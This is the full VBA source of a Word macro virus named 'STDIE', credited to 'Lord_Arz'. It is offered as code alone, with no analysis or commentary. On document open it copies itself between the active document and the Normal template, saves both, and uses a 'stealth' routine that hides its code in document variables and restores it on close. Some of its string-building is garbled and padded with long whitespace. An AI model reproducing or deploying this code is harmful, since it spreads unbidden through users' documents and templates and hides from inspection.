Private Sub Document_Open()
Rem Beginn STDIE
'STDIE by Lord_Arz  TDIE by Flitnic and Lord_Arz (c)
On Error Resume Next
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "REM BEGINN STDIE" Then NormInstalled = True
If UCase(AI) = "REM BEGINN STDIE" Then ActInstalled = True

If NormInstalled = True And ActInstalled = True Then GoTo PayLoad

If NormInstalled = False Then
    Set Infection = NormCarrier
    Set Carrier = ActCarrier
Else
    Set Infection = ActCarrier
    Set Carrier = NormCarrier
End If

With Carrier
    VirCode = .Lines(1, .CountOfLines)
End With
With Infection
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, VirCode
End With
ActiveDocument.Save
NormalTemplate.Save
PayLoad:

Stealth:
StealthModul = "by Lord Arz"
ResetMe = "Private Sub Document_Close()" & Chr(13)
ResetMe = ResetMe & "Beginn:																									If ShowVisualBasicEditor = True Then Normal.ThisDocument.Variables(" & chr(34) & "VCode" & Chr(34) & ").Value = Msgbox " & Chr(34) & "Seven deadly sins, seven ways to win, seven holy path to hell, seven downward slopes, seven blodied hopes, seven are your burnig fires, seven your desires...." & Chr(13)
ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule" & Chr(13)
ResetMe = ResetMe & ".DeleteLines 1, .CountOfLines" & Chr(13)
ResetMe = ResetMe & ".InsertLines 1, ThisDocument.Variables(1).Value" & Chr(13)
ResetMe = ResetMe & "End With" & Chr(13)
ResetMe = ResetMe & "ThisDocument.Save" & Chr(13)
ResetMe = ResetMe & "End Sub"

For x = 1 To ThisDocument.Variables.Count
DoEvents
    ThisDocument.Variables(x).Delete
Next x

With ActCarrier
    VCC = .Lines(1, .CountOfLines)
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe
End With

With NormCarrier
    VCC = .Lines(1, .CountOfLines)
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe
End With

DoEvents
ActiveDocument.Variables.Add "VCode", VCC
Normal.ThisDocument.Variables.Add "VCode", VCC
End Sub
